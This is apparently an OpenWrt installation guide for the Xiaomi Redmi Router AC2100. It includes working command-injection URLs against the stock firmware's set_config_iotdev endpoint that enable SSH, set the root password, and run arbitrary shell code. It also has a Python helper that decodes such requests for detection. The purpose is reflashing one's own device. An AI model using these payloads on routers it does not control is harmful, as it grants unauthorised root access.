The Xiaomi Redmi Router AC2100 is a wireless router based on the MT7621 platform. While it can be acquired at relatively low cost compared to other units with similar specifications, installing OpenWrt requires a somewhat complex process to bypass the locked-down stock firmware. However, a recently discovered web exploit has simplified the procedure significantly.

Supported Versions

Hardware Highlights

Installation

Method : Web Exploit

From Xiaomi AX3600 SSH Guide for the ax3600 router.

Requirements

  1. A computer with an ethernet adapter
  2. One ethernet cable
  3. MiWifi (stock) firmware version 2.0.23 installed on the router
  4. The OpenWrt installation images for this device (from table above)
  5. An SSH client

This exploit also works with firmware 2.0.503.

Obtain SSH Access using a Web Exploit

  1. Upgrade/downgrade to stock firmware version 2.0.23 (md5sum ca32a6cb7e60df65a391fe5f235fb720)
  2. Connect the computer to one of the ethernet ports of the router (not the Internet port)
  3. Set the router admin password via the router web interface
  4. Log in to the web interface using the password you just set and get the value of stok= from the URL: http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
  5. Think of a password for SSH logins (8+ chars long, no special chars)
  6. Enable SSH and set the SSH password

Access the following URL in a browser to enable SSH on the router. Replace <STOK> with the value gained above.

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
Example: http://192.168.31.1/cgi-bin/luci/;stok=f38d1ba0dadb2594cc33016363d644e4/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

… will execute the following commands (no need to type these):

nvram set ssh_en=1;
nvram commit;
sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear;
/etc/init.d/dropbear start;

Enter the next URL to set the SSH root password to <PASSWORD> (replace it with your new root password).

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27<PASSWORD>%5Cn<PASSWORD>%27%20%7C%20passwd%20root%0A
Example: http://192.168.31.1/cgi-bin/luci/;stok=f38d1ba0dadb2594cc33016363d644e4/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27password%5Cnpassword%27%20%7C%20passwd%20root%0A

… will execute the following commands:

echo -e "<PASSWORD>\n<PASSWORD>" | passwd root

You can actually execute any shell code like this (example only, no need to type it):

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0A<YOUR-CODE>%0A
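An added example, not part of the original guide and not Xiaomi or OpenWrt code: a small Python audit helper that URL-decodes the ssid parameter of the two requests above and lists the shell commands each one carries, which is also how such requests can be recognised in a proxy or web log. The function name audit_request, the metacharacter list and the benign request are assumptions made for the illustration.

```python
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/api/misystem/set_config_iotdev"   # endpoint named on this page
# Characters that let a parameter value break out into additional shell commands.
SHELL_META = {";": "semicolon", "\n": "newline", "|": "pipe",
              "&": "ampersand", "`": "backtick", "$": "dollar"}

def audit_request(url, param="ssid"):
    """Return (metacharacters found, commands the decoded value would run)."""
    parts = urlsplit(url)
    if not parts.path.endswith(ENDPOINT):
        return [], []
    value = parse_qs(parts.query, keep_blank_values=True).get(param, [""])[0]
    found = sorted(name for ch, name in SHELL_META.items() if ch in value)
    if not found:
        return [], []
    # Naive split on the two separators this page's URLs use (";" and newline).
    # It ignores shell quoting, which is fine for triage but is not a shell parser.
    # Assumption: the first piece ("-h" here) stays an argument of the original command.
    pieces = [p.strip() for p in value.replace("\n", ";").split(";")]
    return found, [p for p in pieces[1:] if p]

# The two request URLs from this page, with <STOK> and <PASSWORD> left as
# placeholders, plus one constructed benign request for contrast.
BASE = "http://192.168.31.1/cgi-bin/luci/;stok=<STOK>" + ENDPOINT
ENABLE_SSH = BASE + ("?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1"
    "%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22"
    "%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B")
SET_PASSWORD = BASE + ("?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27<PASSWORD>"
    "%5Cn<PASSWORD>%27%20%7C%20passwd%20root%0A")
BENIGN = BASE + "?bssid=Xiaomi&user_id=longdike&ssid=HomeNet-5G"   # constructed

if __name__ == "__main__":
    for label, url in [("enable-ssh", ENABLE_SSH), ("set-password", SET_PASSWORD),
                       ("benign", BENIGN)]:
        found, commands = audit_request(url)
        print(label, "->", found or "clean")
        for c in commands:
            print("    would run:", c)
```

The decoded output matches the command listings given above for each URL; the benign SSID produces no findings.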





Connect via SSH

Log in to the router via SSH as root, e.g. on a terminal (check SSH access for newcomers if unsure)

ssh root@192.168.31.1

The password will be <PASSWORD>, as we set it before.

As soon as you have shell access, execute:

# Enable UART and boot_wait, useful for testing or recovery if you have a UART adapter!
nvram set uart_en=1
nvram set boot_wait=on
nvram set bootdelay=5

# Set kernel1 as the booting kernel
nvram set flag_try_sys1_failed=1

# Commit our nvram changes
nvram commit

Firmware Installation

# Copy the firmware files to the router (MobaXterm's upload feature is enough for this)

Open a new terminal on your computer and change to the directory where you downloaded the firmware files. To copy the files to the router, execute:

scp openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-kernel1.bin root@192.168.31.1:/tmp
scp openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-rootfs0.bin root@192.168.31.1:/tmp

# Back in the terminal connected to the router through SSH, change to the directory where the firmware files are

cd /tmp

# Flash the kernel

mtd write openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-kernel1.bin kernel1

# Flash the rootfs

mtd -r write openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-rootfs0.bin rootfs0

If all has gone well, the router will reboot to OpenWrt. If not, wait at least 5 minutes, then try manually rebooting the router.

Reference links:

[OpenWrt Wiki] Xiaomi Redmi Router AC2100

Download the OpenWrt firmware for your device
